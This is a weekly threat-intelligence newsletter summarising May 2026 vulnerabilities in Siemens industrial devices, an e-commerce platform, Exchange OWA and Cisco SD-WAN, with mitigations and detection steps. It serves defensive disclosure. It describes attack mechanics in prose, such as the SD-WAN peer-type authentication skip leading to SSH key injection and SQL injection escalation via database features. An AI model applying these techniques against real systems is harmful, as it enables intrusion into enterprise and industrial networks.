Threat Intel Weekly #20 — Week ending 19 May 2026

📅 Coverage period: 2026-05-12 → 2026-05-19 | 14 CVEs reviewed | 2 CISA KEV additions

🔴 Critical Vulnerabilities (CVSS ≥ 9.0)

🔴 CVE-2025-40949 (CVSS 9.1)

Product: Siemens RUGGEDCOM ROX — MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, RX5000 (All versions < V2.17.1)
CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command
Reported by: Emmanuel Zhou, Rick Wyble, Mehmet Balta, and Adam Robbie (Palo Alto Networks OT Threat Research Lab)

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (authenticated remote attacker)

Technical Details:

Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI. Commands can be injected into the task scheduling backend, allowing an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying Linux operating system. Unlike some authenticated command-injection flaws that require high-privilege accounts, this vulnerability can be triggered with valid — even limited — credentials.

RUGGEDCOM ROX devices are widely deployed as communication backbone nodes in power grids, oil refineries, manufacturing plants, transportation control cabinets, and electrical utility substations. Root-level code execution on these devices effectively hands an attacker full control over a hardened industrial router, enabling traffic interception, routing manipulation, credential extraction, and lateral movement deeper into the OT network.

Patch / Mitigation:

• Update to RUGGEDCOM ROX firmware V2.17.1 or later — this is the only complete fix.
• To verify your current version: log into the ROX Web Interface → Status → System Information → "Software Version," or via CLI: show system info. Any version string < 2.17.1 is vulnerable.
• Note: RUGGEDCOM ROX (ROX II) is a separate platform from the older Rugged Operating System (ROS) used on switches like the RS900. This CVE does not apply to ROS.
• Per CISA/Siemens guidance, while patching: restrict network access to the Web UI, enforce VPN/jump-host access controls, and disable unnecessary services (Telnet, FTP).
• Follow Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security

References: NVD · Siemens SSA-081142 · CISA ICSA-26-134-12

🔴 CVE-2025-6577 (CVSS 9.8)

Product: Akilli Commerce Software Technologies Ltd. Co. — E-Commerce Website (All versions before 4.5.001)
CWE: CWE-89 — Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)
Disclosed: May 12, 2026

Severity: Critical | Attack Vector: NETWORK | Auth Required: None | Complexity: Low

Technical Details:

This is a pre-authentication, network-reachable SQL Injection vulnerability earning the maximum practical CVSS v3.1 exploitability profile: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. No credentials, no user interaction, and no special conditions are required. An unauthenticated remote attacker can send specially crafted HTTP requests containing malicious SQL syntax to the affected e-commerce application, directly manipulating the backend database.

Successful exploitation can lead to:

• Full database exfiltration — customer PII, order history, payment references, and credentials
• Data modification or deletion — manipulation of product listings, orders, or user accounts
• Authentication bypass — logging in as any user, including administrators, by injecting SQL into login forms
• In some configurations, OS command execution — via database-level features like xp_cmdshell (MSSQL) or INTO OUTFILE (MySQL)

The source advisory was published by the Turkish national cybersecurity authority (siberguvenlik.gov.tr) under TR-26-0222.

Patch / Mitigation:

• Upgrade to E-Commerce Website version 4.5.001 or later immediately — no workarounds exist for an unauthenticated pre-auth SQL injection.
• Until patched, consider placing the application behind a Web Application Firewall (WAF) with SQL injection rules enabled.
• Audit database accounts used by the application and enforce the principle of least privilege — the app's DB user should not have DROP, EXECUTE, or OS-level permissions.
• Review database logs for anomalous query patterns that may indicate prior exploitation.
• Rotate all credentials stored in the application database.

References: NVD · Mondoo Intelligence · Turkish CERT Advisory TR-26-0222

🔴 CVE-2026-22924 (CVSS 9.1)

Product: Siemens SIMATIC CN 4100 (All versions < V5.0)
CWE: CWE-400 — Uncontrolled Resource Consumption (Resource Exhaustion) / Improper Restriction of Unauthenticated Connections
Advisory: Siemens SSA (May 12, 2026) · CISA ICSA-26-134-10 (May 14, 2026)

Severity: Critical | Attack Vector: NETWORK | Auth Required: None

Technical Details:

The SIMATIC CN 4100 communication node — a compact industrial PC used to interface SIMATIC controllers with IT/cloud infrastructure — does not properly restrict unauthenticated network connections. The vulnerability enables resource exhaustion attacks that can be triggered remotely without credentials.

An attacker who can reach the device over the network can flood it with crafted connection requests, overwhelming its connection-handling subsystem. This can result in:

• Denial of service (DoS) — disrupting legitimate communication between the CN 4100 and connected SIMATIC controllers, effectively cutting off industrial process monitoring and control signals
• Unauthorized actions — in certain conditions, the improper connection handling may permit an unauthenticated attacker to perform limited unauthorized operations on the system

This vulnerability is especially concerning because the SIMATIC CN 4100 acts as a bridge between OT and IT/cloud layers. Disrupting it can cascade into loss of visibility or control over upstream industrial processes. Siemens and CISA noted that this CN 4100 advisory bundles over 300 third-party component vulnerabilities alongside CVE-2026-22924, all addressed by upgrading to V5.0.

Patch / Mitigation:

• Update SIMATIC CN 4100 to firmware V5.0 or later: Siemens Support Portal
• As a short-term compensating control, place the CN 4100 on an isolated network segment and restrict access to the device's network ports from untrusted hosts using firewall rules.
• Disable any unnecessary remote-access services.
• Monitor device logs and network traffic for abnormal connection-rate anomalies targeting the device.

References: NVD · CISA ICSA-26-134-10 · SecurityWeek — May 2026 ICS Patch Tuesday

🔴 CVE-2026-25786 (CVSS 9.1)

Product: Siemens SIMATIC S7 series — devices with web interface (exact model list per Siemens SSA)
CWE: CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)
Advisory: May 2026 Siemens Patch Tuesday

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (must be authorized to download TIA projects)

Technical Details:

The affected Siemens SIMATIC S7 devices do not properly validate or sanitize PLC/station names rendered on the "Communication Parameters" page of the device's web interface. An attacker who holds valid credentials and is authorized to download a TIA (Totally Integrated Automation) Portal project into the device can embed malicious JavaScript payloads within a PLC or station name field in the TIA project file.

When a victim — such as an engineer or plant operator — navigates to the Communication Parameters page in their browser, the injected script executes in the context of that user's authenticated web session. Depending on the victim's privileges, this stored XSS can be used to:

• Steal session tokens — hijacking the victim's authenticated session entirely
• Perform unauthorized actions on the device on behalf of the victim
• Pivot laterally by harvesting credentials from the browser session to reach other OT assets

In operational environments where engineers browse multiple PLC interfaces during maintenance windows, a single compromised project file can silently target many users. SecurityWeek noted this as one of several critical flaws Siemens addressed in the May 2026 Patch Tuesday across the SIMATIC S7 web server family.

Patch / Mitigation:

• Apply the firmware update specified in Siemens' SSA advisory for your exact SIMATIC product/model.
• Validate and audit all TIA project files before loading them onto devices, especially files received from third parties or via email.
• Restrict web interface access to engineering workstations on isolated, trusted VLANs.
• Enforce MFA on all accounts authorized to download TIA projects.
• Monitor for unexpected web-UI access patterns or session anomalies after project uploads.

References: NVD · Siemens ProductCERT Portal · SecurityWeek ICS Patch Tuesday

🔴 CVE-2026-25787 (CVSS 9.1)

Product: Siemens SIMATIC S7 series — devices with Motion Control web interface
CWE: CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)
Advisory: May 2026 Siemens Patch Tuesday

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (must be authorized to download TIA projects)

Technical Details:

This vulnerability is closely related to CVE-2026-25786 but targets a different web UI page and a different data field. Affected devices do not properly validate or sanitize Technology Object (TO) names rendered on the "Motion Control Diagnostics" page of the web interface.

Just as with CVE-2026-25786, an attacker authorized to upload a TIA project can craft a malicious Technology Object name containing JavaScript. The payload persists within the device and executes in the context of any user who visits the Motion Control Diagnostics page. This is a stored (persistent) XSS — unlike reflected XSS, it does not require tricking the victim into clicking a specially crafted link; simply browsing to the diagnostics page is sufficient.

In motion-control-heavy environments (automotive assembly, robotics, CNC machining), the Motion Control Diagnostics page is frequently accessed by technicians during calibration and troubleshooting, making this a high-traffic attack surface.

The impact is identical to CVE-2026-25786: session hijacking, unauthorized device actions, and potential lateral movement.

Patch / Mitigation:

• Same remediation path as CVE-2026-25786 — apply the firmware update from the Siemens SSA advisory.
• Treat both CVE-2026-25786 and CVE-2026-25787 as a paired risk — if your device is affected by one, it is likely affected by both.
• Apply the same supply-chain hygiene controls for TIA project files: validate provenance before deploying any project to production devices.
• Limit access to the Motion Control Diagnostics page to a minimum set of authorized personnel on trusted network segments.

References: NVD · Siemens ProductCERT Portal · SecurityWeek ICS Patch Tuesday

🟠 High Severity Vulnerabilities (CVSS 7.0–8.9)

🚨 CISA Known Exploited Vulnerabilities — Added This Week

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog this week, meaning they are actively exploited in the wild:

Federal agencies must remediate these by the due dates listed. Non-federal organizations are strongly encouraged to prioritize these as well.

🚨 KEV Deep-Dive: CVE-2026-42897 — Microsoft Exchange Server OWA XSS (Zero-Day)

CVSS: 8.1 (High) | CWE: CWE-79 | Exploit Status: Actively exploited in the wild — zero-day, no permanent patch yet

What happened: Microsoft disclosed CVE-2026-42897 on May 15, 2026 — just two days after its May Patch Tuesday which addressed 120+ other vulnerabilities — after detecting active exploitation. An anonymous researcher discovered and reported the flaw. CISA added it to the KEV catalog the same day with a two-week federal remediation deadline (May 29, 2026).

How it works: The vulnerability resides in Outlook Web Access (OWA), the browser-based email interface for on-premises Exchange Server. An unauthenticated attacker sends a specially crafted email to a target. When the victim opens it in OWA and certain interaction conditions are met, attacker-controlled JavaScript executes in the context of the victim's authenticated browser session. This can be used to hijack sessions, steal tokens, access mailbox contents, and perform actions on behalf of the victim — all without the attacker needing Exchange credentials of their own.

Affected versions: Exchange Server Subscription Edition RTM, 2019, and 2016 (on-premises only). Exchange Online is NOT affected.

Why it matters: Exchange servers sit at the center of enterprise communications, authentication workflows, and sensitive business data. CISA's KEV catalog currently lists nearly two dozen Exchange flaws — several weaponized by ransomware groups including Hive, LockBit, and Cuba. Because a permanent patch is not yet available, the risk window is open.

Immediate mitigations:

• Enable and verify the Exchange Emergency Mitigation Service (EEMS) — it is on by default and automatically applies a URL rewrite that blocks the XSS attack vector. Confirm it is running and that the CVE-2026-42897 mitigation has been applied.
• For restricted/air-gapped networks: use the Exchange On-premises Mitigation Tool (EOMT) with the CVE-2026-42897 script.
• Restrict OWA exposure — do not expose Exchange OWA directly to the internet if avoidable.
• Monitor for suspicious email patterns, unusual OWA session activity, and anomalous mailbox actions.
• Apply Microsoft's permanent security update as soon as it becomes available.

References: The Hacker News · Help Net Security · SecurityWeek · Security Affairs

🚨 KEV Deep-Dive: CVE-2026-20182 — Cisco Catalyst SD-WAN Authentication Bypass (CVSS 10.0)

CVSS: 10.0 (Critical — Maximum) | CWE: CWE-287 — Improper Authentication | Exploit Status: Actively exploited — attributed to UAT-8616, a nation-state-level threat actor

What happened: Rapid7 researchers Stephen Fewer and Jonah Burgess discovered this flaw while studying a related prior vulnerability (CVE-2026-20127). Rapid7 disclosed it to Cisco on March 9, 2026. Cisco confirmed exploitation in May 2026 and released fixes. CISA added CVE-2026-20182 to the KEV catalog on May 14, 2026, with a tight two-day federal remediation window (deadline: May 17, 2026).

How it works: The vulnerability lies in the vdaemon service over DTLS (UDP port 12346) — the control-plane peering port used for inter-controller and controller-to-edge communication in SD-WAN fabrics. During the authentication handshake, when a connecting peer claims to be a vHub device (device type 2), device-type-specific certificate verification is skipped, yet the peer is still marked as authenticated. This logic flaw allows a remote unauthenticated attacker to become a fully trusted control-plane peer, then perform privileged operations including injecting SSH keys into the vmanage-admin user account.

Post-exploitation (UAT-8616 TTPs):

• Added unauthorized SSH keys
• Modified NETCONF configurations
• Attempted root privilege escalation
• Infrastructure overlaps with Operational Relay Box (ORB) networks used for obfuscation
• A public Metasploit module is already available for this CVE

Affected products: Cisco Catalyst SD-WAN Controller and Manager — on-premises, Cloud-Pro, Cisco Managed Cloud, and FedRAMP deployments. Configuration-independent: no deployment settings protect against this.

Why it matters: The SD-WAN controller is the central control plane of the entire SD-WAN fabric. Compromising it means an attacker can intercept, reroute, or blackhole traffic across the entire enterprise WAN. There are no workarounds — only patching fixes this. A public PoC exists and multiple threat clusters (at least 10 tracked by Cisco Talos) are already exploiting related SD-WAN flaws. Talos also warns of chained exploitation of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 in combination for unauthenticated remote access, active since March 2026.

Immediate actions:

1. Upgrade Cisco Catalyst SD-WAN Controller and Manager to a fixed release immediately — consult Cisco's advisory for your specific release train.
2. Before upgrading, run request admin-tech on each control component and collect logs for Cisco TAC review.
3. Examine /var/log/auth.log for entries like Accepted publickey for vmanage-admin from [unknown IP].
4. Review all control-connection peering events in SD-WAN logs — focus on unexpected vmanage peer types or connections from unfamiliar IPs.
5. Open a Cisco TAC case (Severity 3, include CVE-2026-20182 in the title) if you suspect compromise.
6. Follow CISA Emergency Directive 26-03 and the associated Hunt & Hardening Guidance for Cisco SD-WAN Devices.

References: Cisco Advisory · Rapid7 Disclosure · Cisco Talos · The Hacker News · SOCRadar

📌 This Week's TL;DR

1. Patch CVE-2026-20182 (CVSS 10.0) NOW — Cisco SD-WAN auth bypass with a public Metasploit module, actively exploited by UAT-8616 (nation-state level). No workarounds. Federal deadline was May 17. If you haven't patched, assume you may already be compromised and initiate TAC case.

2. Mitigate CVE-2026-42897 immediately, patch when available — Exchange Server zero-day with active exploitation, no permanent patch yet. Enable EEMS now. On-prem Exchange only; Exchange Online is safe. Federal deadline is May 29.

3. Patch all RUGGEDCOM ROX devices to V2.17.1 — Addresses CVE-2025-40949 (root command injection via Scheduler, CVSS 9.1), CVE-2025-40947 (command injection via feature key, CVSS 7.5), and CVE-2025-40833 (null pointer DoS, CVSS 7.5) in a single firmware update. Critical infrastructure operators should treat this as an emergency change.

4. Update SIMATIC CN 4100 to V5.0 — Resolves CVE-2026-22924 (unauthenticated resource exhaustion, CVSS 9.1) and over 300 bundled third-party component CVEs. The CN 4100 bridges OT and IT/cloud; disrupting it can cascade into loss of industrial process visibility.

5. Patch SIMATIC S7 web interfaces for CVE-2026-25786 and CVE-2026-25787 — Paired stored XSS vulnerabilities in TIA project-rendered web pages. An engineer browsing the Communication Parameters or Motion Control Diagnostics page is silently targeted. Audit TIA project provenance and apply Siemens' firmware update.

6. CVE-2025-6577 (CVSS 9.8) — SQL Injection in Akilli E-Commerce — Pre-auth, no-complexity SQLi with full CIA impact. Upgrade to version 4.5.001 immediately. If you use this platform, rotate all database credentials and review logs for signs of prior exfiltration.

Next edition publishes next Friday. Have a threat feed, IOC, or CVE you want covered? Reach me at the contact page.